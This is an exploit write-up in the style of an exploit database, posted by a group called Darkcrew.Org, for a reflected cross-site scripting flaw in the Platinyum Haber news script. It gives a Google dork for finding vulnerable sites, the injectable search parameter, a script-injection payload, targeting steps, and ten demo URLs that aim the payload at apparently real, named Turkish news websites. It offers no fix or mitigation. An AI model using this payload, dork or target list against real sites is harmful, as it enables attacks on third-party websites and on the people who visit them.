######################
# Exploit Title : Platinyum Haber Scripti Cross Site Scripting
# Exploit Author : Darkcrew.Org
# Vendor Homepage : https://www.tumeva.com/
# Google Dork : intext:"Yazılım: Tumeva Bilişim Copyright © 2016"
# Date: 29.06.2016
# Contact: sultan.ahmir1997@yandex.com
######################
# Vulnerable File : /arama-sonuclari/?baslik=
# Payload : "/></script><script>alert(/MirSultan/)</script>
# Describe : Search dork and select Target. Put /arama-sonuclari/?baslik= After url such as :
# http://site.com/arama-sonuclari/?baslik=
# Send data(Payload) with post method ... Ok
#
# Demo :
# http://www.skytv.com.tr/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.haberantalya.com/arama-sonuclari/?baslik="/</script><script>alert(/MirSultan/)</script>
# http://www.gunaydingazetesi.com.tr/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.sozcuege.com/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.turgutluyanki.com/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.gazetedogu.com/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.voleybolx.com/arama-sonuclari-galeri/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.guncelfutbol.com/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.aksaraygundem.net/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
# http://www.bgbulturk.org/arama-sonuclari/?baslik="/></script><script>alert(/MirSultan/)</script>
#
######################
# discovered by : Batur-ı Mir Sultan
######################